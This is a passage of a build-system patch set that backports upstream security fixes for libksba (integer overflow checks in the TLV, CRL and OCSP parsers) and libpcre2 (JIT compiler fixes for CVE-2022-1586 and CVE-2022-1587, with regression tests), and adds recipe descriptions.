+Subject: [PATCH] Detect a possible overflow directly in the TLV parser.
+
+* src/ber-help.c (_ksba_ber_read_tl): Check for overflow of a commonly
+used sum.
+--
+
+It is quite common to have checks like
+
+ if (ti.nhdr + ti.length >= DIM(tmpbuf))
+ return gpg_error (GPG_ERR_TOO_LARGE);
+
+This patch detects possible integer overflows immmediately when
+creating the TI object.
+
+Reported-by: ZDI-CAN-18927, ZDI-CAN-18928, ZDI-CAN-18929
+
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=patch;h=4b7d9cd4a018898d7714ce06f3faf2626c14582b]
+CVE: CVE-2022-3515
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/ber-help.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/ber-help.c b/src/ber-help.c
+index 81c31ed..56efb6a 100644
+--- a/src/ber-help.c
++++ b/src/ber-help.c
+@@ -182,6 +182,12 @@ _ksba_ber_read_tl (ksba_reader_t reader, struct tag_info *ti)
+ ti->length = len;
+ }
+
++ if (ti->length > ti->nhdr && (ti->nhdr + ti->length) < ti->length)
++ {
++ ti->err_string = "header+length would overflow";
++ return gpg_error (GPG_ERR_EOVERFLOW);
++ }
++
+ /* Without this kludge some example certs can't be parsed */
+ if (ti->class == CLASS_UNIVERSAL && !ti->tag)
+ ti->length = 0;
+--
+2.11.0
+
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
new file mode 100644
index 0000000000..b09d0eb557
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
@@ -0,0 +1,69 @@
+From b17444b3c47e32c77a3ba5335ae30ccbadcba3cf Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Tue, 22 Nov 2022 16:36:46 +0100
+Subject: [PATCH] Fix an integer overflow in the CRL signature parser.
+
+* src/crl.c (parse_signature): N+N2 now checked for overflow.
+
+* src/ocsp.c (parse_response_extensions): Do not accept too large
+values.
+(parse_single_extensions): Ditto.
+--
+
+The second patch is an extra safegourd not related to the reported
+bug.
+
+GnuPG-bug-id: 6284
+Reported-by: Joseph Surin, elttam
+CVE: CVE-2022-47629
+https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=commit;h=f61a5ea4e0f6a80fd4b28ef0174bee77793cf070
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/crl.c | 2 +-
+ src/ocsp.c | 12 ++++++++++++
+ 2 files changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/crl.c b/src/crl.c
+index 87a3fa3..9d3028e 100644
+--- a/src/crl.c
++++ b/src/crl.c
+@@ -1434,7 +1434,7 @@ parse_signature (ksba_crl_t crl)
+ && !ti.is_constructed) )
+ return gpg_error (GPG_ERR_INV_CRL_OBJ);
+ n2 = ti.nhdr + ti.length;
+- if (n + n2 >= DIM(tmpbuf))
++ if (n + n2 >= DIM(tmpbuf) || (n + n2) < n)
+ return gpg_error (GPG_ERR_TOO_LARGE);
+ memcpy (tmpbuf+n, ti.buf, ti.nhdr);
+ err = read_buffer (crl->reader, tmpbuf+n+ti.nhdr, ti.length);
+diff --git a/src/ocsp.c b/src/ocsp.c
+index 4b26f8d..c41234e 100644
+--- a/src/ocsp.c
++++ b/src/ocsp.c
+@@ -912,6 +912,12 @@ parse_response_extensions (ksba_ocsp_t ocsp,
+ else
+ ocsp->good_nonce = 1;
+ }
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
+@@ -979,6 +985,12 @@ parse_single_extensions (struct ocsp_reqitem_s *ri,
+ err = parse_octet_string (&data, &datalen, &ti);
+ if (err)
+ goto leave;
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
diff --git a/meta/recipes-support/libksba/libksba_1.3.5.bb b/meta/recipes-support/libksba/libksba_1.3.5.bb
index 336d7f8177..5293aa91e1 100644
--- a/meta/recipes-support/libksba/libksba_1.3.5.bb
+++ b/meta/recipes-support/libksba/libksba_1.3.5.bb
@@ -1,4 +1,9 @@
SUMMARY = "Easy API to create and parse X.509 and CMS related objects"
+DESCRIPTION = "A library to make the tasks of working with X.509 certificates, \
+CMS data and related objects more easy. It provides a highlevel interface to \
+the implemented protocols and presents the data in a consistent way. The \
+library does not rely on another cryptographic library but provides \
+hooks for easy integration with Libgcrypt. "
HOMEPAGE = "http://www.gnupg.org/related_software/libksba/"
LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)"
LICENSE_${PN} = "GPLv2+ | LGPLv3+"
@@ -17,7 +22,10 @@ inherit autotools binconfig-disabled pkgconfig texinfo
UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html"
SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
- file://ksba-add-pkgconfig-support.patch"
+ file://ksba-add-pkgconfig-support.patch \
+ file://CVE-2022-47629.patch \
+ file://CVE-2022-3515.patch \
+"
SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2"
SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340"
diff --git a/meta/recipes-support/libnl/libnl_3.5.0.bb b/meta/recipes-support/libnl/libnl_3.5.0.bb
index 9d0e1441a9..f4b5d40bb2 100644
--- a/meta/recipes-support/libnl/libnl_3.5.0.bb
+++ b/meta/recipes-support/libnl/libnl_3.5.0.bb
@@ -1,4 +1,9 @@
SUMMARY = "A library for applications dealing with netlink sockets"
+DESCRIPTION = "The libnl suite is a collection of libraries providing \
+APIs to netlink protocol based Linux kernel interfaces. libnl is the core \
+library implementing the fundamentals required to use the netlink protocol \
+such as socket handling, message construction and parsing, and sending \
+and receiving of data."
HOMEPAGE = "http://www.infradead.org/~tgr/libnl/"
SECTION = "libs/network"
diff --git a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch b/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
deleted file mode 100644
index 89b44f6aa6..0000000000
--- a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-Upstream-Status: Inappropriate [debian patch]
-
-This patch address a namespace collision with libc.
-
-Although there is no "#include <regex.h>" in the source file, at
-runtime, it's unintentionally linked to the libc version, the regcomp of
-libc is called instead the pcre one using pcre's data structure...
-that looks like a disaster.
-
-Can patch is from Debian (and Ubuntu 11.04alpha has it also).
-
-[sgw: added patch comment]
-Signed-off-by: Qing He <qing.he@intel.com>
-Signed-off-by: Saul Wold <sgw@linux.intel.com>
-
---- a/pcreposix.h 2010-05-17 00:17:23.000000000 +0800
-+++ b/pcreposix.h 2009-01-15 04:32:17.000000000 +0800
-@@ -133,14 +130,19 @@
-
- /* The functions */
-
--PCREPOSIX_EXP_DECL int regcomp(regex_t *, const char *, int);
--PCREPOSIX_EXP_DECL int regexec(const regex_t *, const char *, size_t,
-+PCREPOSIX_EXP_DECL int pcreposix_regcomp(regex_t *, const char *, int);
-+PCREPOSIX_EXP_DECL int pcreposix_regexec(const regex_t *, const char *, size_t,
- regmatch_t *, int);
--PCREPOSIX_EXP_DECL size_t regerror(int, const regex_t *, char *, size_t);
--PCREPOSIX_EXP_DECL void regfree(regex_t *);
-+PCREPOSIX_EXP_DECL size_t pcreposix_regerror(int, const regex_t *, char *, size_t);
-+PCREPOSIX_EXP_DECL void pcreposix_regfree(regex_t *);
-
- #ifdef __cplusplus
- } /* extern "C" */
- #endif
-
-+#define regcomp pcreposix_regcomp
-+#define regexec pcreposix_regexec
-+#define regerror pcreposix_regerror
-+#define regfree pcreposix_regfree
-+
- #endif /* End of pcreposix.h */
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
new file mode 100644
index 0000000000..42ee417fe7
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
@@ -0,0 +1,30 @@
+From 5d1e62b0155292b994aa1c96d4ed8ce4346ef4c2 Mon Sep 17 00:00:00 2001
+From: Zoltan Herczeg <hzmester@freemail.hu>
+Date: Thu, 24 Mar 2022 05:34:42 +0000
+Subject: [PATCH] Fix incorrect value reading in JIT.
+
+CVE: CVE-2022-1586
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc3]
+
+(cherry picked from commit d4fa336fbcc388f89095b184ba6d99422cfc676c)
+Signed-off-by: Shinu Chandran <shinucha@cisco.com>
+---
+ src/pcre2_jit_compile.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 493c96d..fa57942 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7188,7 +7188,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST && *cc == XCL_PROP)
++ if (*cc == PT_CLIST && cc[-1] == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+--
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
new file mode 100644
index 0000000000..fbbbc9ca77
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
@@ -0,0 +1,59 @@
+From 233c4248550d0c1d9bfee42198d5ee0855b7d413 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 13:52:39 +0530
+Subject: [PATCH] CVE-2022-1586
+
+Upstream-Status: Backport from https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ ChangeLog | 3 +++
+ src/pcre2_jit_compile.c | 2 +-
+ src/pcre2_jit_test.c | 4 ++++
+ 3 files changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index 0926c29..b5d72dc 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,6 +1,9 @@
+ Change Log for PCRE2
+ --------------------
+
++23. Fixed a unicode properrty matching issue in JIT. The character was not
++fully read in caseless matching.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index f564127..5d43865 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7119,7 +7119,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST)
++ if (*cc == PT_CLIST && *cc == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index a9b3880..9df87fd 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -408,6 +408,10 @@ static struct regression_test_case regression_test_cases[] = {
+ { MUP, A, 0, 0 | F_PROPERTY, "[\xc3\xa2-\xc3\xa6\xc3\x81-\xc3\x84\xe2\x80\xa8-\xe2\x80\xa9\xe6\x92\xad\\p{Zs}]{2,}", "\xe2\x80\xa7\xe2\x80\xa9\xe6\x92\xad \xe6\x92\xae" },
+ { MUP, A, 0, 0 | F_PROPERTY, "[\\P{L&}]{2}[^\xc2\x85-\xc2\x89\\p{Ll}\\p{Lu}]{2}", "\xc3\xa9\xe6\x92\xad.a\xe6\x92\xad|\xc2\x8a#" },
+ { PCRE2_UCP, 0, 0, 0 | F_PROPERTY, "[a-b\\s]{2,5}[^a]", "AB baaa" },
++ { MUP, 0, 0, 0 | F_NOMATCH, "[^\\p{Hangul}\\p{Z}]", " " },
++ { MUP, 0, 0, 0, "[\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { MUP, 0, 0, 0, "[\\x{a92e}\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { CMUP, 0, 0, 0, "[^S]\\B", "\xe2\x80\x8a" },
+
+ /* Possible empty brackets. */
+ { MU, A, 0, 0, "(?:|ab||bc|a)+d", "abcxabcabd" },
+--
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
new file mode 100644
index 0000000000..70f9f9f079
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
@@ -0,0 +1,660 @@
+From aa5aac0d209e3debf80fc2db924d9401fc50454b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 14:11:11 +0530
+Subject: [PATCH] CVE-2022-1587
+
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0]
+CVE: CVE-2022-1587
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ ChangeLog | 3 +
+ src/pcre2_jit_compile.c | 290 ++++++++++++++++++++++++++--------------
+ src/pcre2_jit_test.c | 1 +
+ 3 files changed, 194 insertions(+), 100 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index b5d72dc..de82de9 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -4,6 +4,9 @@ Change Log for PCRE2
+ 23. Fixed a unicode properrty matching issue in JIT. The character was not
+ fully read in caseless matching.
+
++24. Fixed an issue affecting recursions in JIT caused by duplicated data
++transfers.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 5d43865..493c96d 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -407,6 +407,9 @@ typedef struct compiler_common {
+ /* Locals used by fast fail optimization. */
+ sljit_s32 fast_fail_start_ptr;
+ sljit_s32 fast_fail_end_ptr;
++ /* Variables used by recursive call generator. */
++ sljit_s32 recurse_bitset_size;
++ uint8_t *recurse_bitset;
+
+ /* Flipped and lower case tables. */
+ const sljit_u8 *fcc;
+@@ -2109,19 +2112,39 @@ for (i = 0; i < RECURSE_TMP_REG_COUNT; i++)
+
+ #undef RECURSE_TMP_REG_COUNT
+
++static BOOL recurse_check_bit(compiler_common *common, sljit_sw bit_index)
++{
++uint8_t *byte;
++uint8_t mask;
++
++SLJIT_ASSERT((bit_index & (sizeof(sljit_sw) - 1)) == 0);
++
++bit_index >>= SLJIT_WORD_SHIFT;
++
++mask = 1 << (bit_index & 0x7);
++byte = common->recurse_bitset + (bit_index >> 3);
++
++if (*byte & mask)
++ return FALSE;
++
++*byte |= mask;
++return TRUE;
++}
++
+ static int get_recurse_data_length(compiler_common *common, PCRE2_SPTR cc, PCRE2_SPTR ccend,
+ BOOL *needs_control_head, BOOL *has_quit, BOOL *has_accept)
+ {
+ int length = 1;
+-int size;
++int size, offset;
+ PCRE2_SPTR alternative;
+ BOOL quit_found = FALSE;
+ BOOL accept_found = FALSE;
+ BOOL setsom_found = FALSE;
+ BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+ BOOL control_head_found = FALSE;
+
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
++
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ control_head_found = TRUE;
+@@ -2144,15 +2167,17 @@ while (cc < ccend)
+ setsom_found = TRUE;
+ if (common->mark_ptr != 0)
+ setmark_found = TRUE;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_KET:
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0)
+ {
+- length++;
++ if (recurse_check_bit(common, offset))
++ length++;
+ SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+ cc += PRIVATE_DATA(cc + 1);
+ }
+@@ -2169,39 +2194,55 @@ while (cc < ccend)
+ case OP_SBRA:
+ case OP_SBRAPOS:
+ case OP_SCOND:
+- length++;
+ SLJIT_ASSERT(PRIVATE_DATA(cc) != 0);
++ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_CBRA:
+ case OP_SCBRA:
+- length += 2;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
+- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++ offset = GET2(cc, 1 + LINK_SIZE);
++ if (recurse_check_bit(common, OVECTOR(offset << 1)))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++ length += 2;
++ }
++ if (common->optimized_cbracket[offset] == 0 && recurse_check_bit(common, OVECTOR_PRIV(offset)))
++ length++;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ length++;
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_CBRAPOS:
+ case OP_SCBRAPOS:
+- length += 2 + 2;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ if (recurse_check_bit(common, OVECTOR(offset << 1)))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++ length += 2;
++ }
++ if (recurse_check_bit(common, OVECTOR_PRIV(offset)))
++ length++;
++ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++ length++;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++ length++;
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_COND:
+ /* Might be a hidden SCOND. */
+ alternative = cc + GET(cc, 1);
+- if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
++ if ((*alternative == OP_KETRMAX || *alternative == OP_KETRMIN) && recurse_check_bit(common, PRIVATE_DATA(cc)))
+ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length++;
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2210,8 +2251,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2219,8 +2264,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2228,20 +2277,29 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length++;
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 1 + IMM2_SIZE;
+ break;
+
+@@ -2253,7 +2311,9 @@ while (cc < ccend)
+ #else
+ size = 1 + 32 / (int)sizeof(PCRE2_UCHAR);
+ #endif
+- if (PRIVATE_DATA(cc) != 0)
++
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length += get_class_iterator_size(cc + size);
+ cc += size;
+ break;
+@@ -2288,8 +2348,7 @@ while (cc < ccend)
+ case OP_THEN:
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ quit_found = TRUE;
+- if (!control_head_found)
+- control_head_found = TRUE;
++ control_head_found = TRUE;
+ cc++;
+ break;
+
+@@ -2309,8 +2368,6 @@ SLJIT_ASSERT(cc == ccend);
+
+ if (control_head_found)
+ length++;
+-if (capture_last_found)
+- length++;
+ if (quit_found)
+ {
+ if (setsom_found)
+@@ -2343,14 +2400,12 @@ sljit_sw shared_srcw[3];
+ sljit_sw kept_shared_srcw[2];
+ int private_count, shared_count, kept_shared_count;
+ int from_sp, base_reg, offset, i;
+-BOOL setsom_found = FALSE;
+-BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+-BOOL control_head_found = FALSE;
++
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
+
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+-control_head_found = TRUE;
++recurse_check_bit(common, common->control_head_ptr);
+ #endif
+
+ switch (type)
+@@ -2438,11 +2493,10 @@ while (cc < ccend)
+ {
+ case OP_SET_SOM:
+ SLJIT_ASSERT(common->has_set_som);
+- if (has_quit && !setsom_found)
++ if (has_quit && recurse_check_bit(common, OVECTOR(0)))
+ {
+ kept_shared_srcw[0] = OVECTOR(0);
+ kept_shared_count = 1;
+- setsom_found = TRUE;
+ }
+ cc += 1;
+ break;
+@@ -2450,33 +2504,31 @@ while (cc < ccend)
+ case OP_RECURSE:
+ if (has_quit)
+ {
+- if (common->has_set_som && !setsom_found)
++ if (common->has_set_som && recurse_check_bit(common, OVECTOR(0)))
+ {
+ kept_shared_srcw[0] = OVECTOR(0);
+ kept_shared_count = 1;
+- setsom_found = TRUE;
+ }
+- if (common->mark_ptr != 0 && !setmark_found)
++ if (common->mark_ptr != 0 && recurse_check_bit(common, common->mark_ptr))
+ {
+ kept_shared_srcw[kept_shared_count] = common->mark_ptr;
+ kept_shared_count++;
+- setmark_found = TRUE;
+ }
+ }
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+ shared_srcw[0] = common->capture_last_ptr;
+ shared_count = 1;
+- capture_last_found = TRUE;
+ }
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_KET:
+- if (PRIVATE_DATA(cc) != 0)
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0)
+ {
+- private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+ cc += PRIVATE_DATA(cc + 1);
+ }
+@@ -2493,50 +2545,66 @@ while (cc < ccend)
+ case OP_SBRA:
+ case OP_SBRAPOS:
+ case OP_SCOND:
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_CBRA:
+ case OP_SCBRA:
+- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+- shared_srcw[0] = OVECTOR(offset);
+- shared_srcw[1] = OVECTOR(offset + 1);
+- shared_count = 2;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ shared_srcw[0] = OVECTOR(offset << 1);
++ if (recurse_check_bit(common, shared_srcw[0]))
++ {
++ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++ shared_count = 2;
++ }
+
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+- shared_srcw[2] = common->capture_last_ptr;
+- shared_count = 3;
+- capture_last_found = TRUE;
++ shared_srcw[shared_count] = common->capture_last_ptr;
++ shared_count++;
+ }
+
+- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++ if (common->optimized_cbracket[offset] == 0)
+ {
+- private_count = 1;
+- private_srcw[0] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++ private_srcw[0] = OVECTOR_PRIV(offset);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ }
++
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_CBRAPOS:
+ case OP_SCBRAPOS:
+- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+- shared_srcw[0] = OVECTOR(offset);
+- shared_srcw[1] = OVECTOR(offset + 1);
+- shared_count = 2;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ shared_srcw[0] = OVECTOR(offset << 1);
++ if (recurse_check_bit(common, shared_srcw[0]))
++ {
++ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++ shared_count = 2;
++ }
+
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+- shared_srcw[2] = common->capture_last_ptr;
+- shared_count = 3;
+- capture_last_found = TRUE;
++ shared_srcw[shared_count] = common->capture_last_ptr;
++ shared_count++;
+ }
+
+- private_count = 2;
+ private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
++
++ offset = OVECTOR_PRIV(offset);
++ if (recurse_check_bit(common, offset))
++ {
++ private_srcw[private_count] = offset;
++ private_count++;
++ }
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+@@ -2545,18 +2613,17 @@ while (cc < ccend)
+ alternative = cc + GET(cc, 1);
+ if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
+ {
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ }
+ cc += 1 + LINK_SIZE;
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc))
+- {
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2564,11 +2631,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2577,11 +2645,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
